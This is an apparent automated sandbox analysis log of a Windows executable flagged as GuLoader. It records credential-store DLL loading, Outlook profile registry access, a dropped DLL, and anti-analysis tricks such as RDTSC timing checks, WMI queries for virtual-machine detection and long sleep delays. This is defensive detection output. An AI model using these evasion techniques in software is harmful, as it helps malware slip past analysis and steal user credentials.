Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

File written: C:\Users\user\AppData\Local\Temp\Settings.ini

Jump to behavior

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: Process Memory Space: u9aPQQIwhj.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: 00000000.00000002.2410860650.0000000005FBA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406252

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

Code function: 0_2_10002DB0 push eax; ret

0_2_10002DDE

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

File created: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	API/Special instruction interceptor: Address: 6922E92
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	API/Special instruction interceptor: Address: 35E2E92

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	RDTSC instruction interceptor: First address: 68C7DE5 second address: 68C7DE5 instructions: 0x00000000 rdtsc 0x00000002 test bh, ch 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FAF0072AF56h 0x00000008 cmp edx, ebx 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	RDTSC instruction interceptor: First address: 3587DE5 second address: 3587DE5 instructions: 0x00000000 rdtsc 0x00000002 test bh, ch 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FAF0074E376h 0x00000008 cmp edx, ebx 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c rdtsc

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Memory allocated: 35F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Memory allocated: 35D10000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 599007	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 598889	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 595683	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 594914	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 594702	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 594554	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 594437	Jump to behavior

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Window / User API: threadDelayed 1934			Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Window / User API: threadDelayed 7912			Jump to behavior

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

API coverage: 1.5 %

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8128	Thread sleep count: 1934 > 30	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8128	Thread sleep count: 7912 > 30	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -599007s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -598889s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -598547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -598437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -598219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -598094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -597765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -597219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -597109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -597000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -596890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -596781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -596672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -596562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -596453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -596343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -596234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -596125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -596015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -595906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -595797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -595683s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -595469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -595359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -595250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -595140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -595031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -594914s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -594812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -594702s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -594554s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124	Thread sleep time: -594437s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405770
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 0_2_0040622B FindFirstFileW,FindClose,	0_2_0040622B
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 0_2_0040276E FindFirstFileW,	0_2_0040276E
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_0040276E FindFirstFileW,	4_2_0040276E
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405770
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_0040622B FindFirstFileW,FindClose,	4_2_0040622B

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 599007	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 598889	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 596125	Jump to behavior
